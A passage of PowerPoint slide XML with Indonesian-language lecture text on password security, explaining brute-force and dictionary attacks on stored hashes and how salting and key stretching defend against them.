              <a:t>Fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> brute force dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecocokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> brute force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kombinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>huruf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>angka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simbol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>frasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlambat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash. Hash yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diasinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>(salt + kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>) * SHA = hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salt yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>acak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> plaintext yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Salt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirahasiakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Nilai hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikompilasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salt yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Peregangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peregangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> garam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>acak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubahnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teratur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
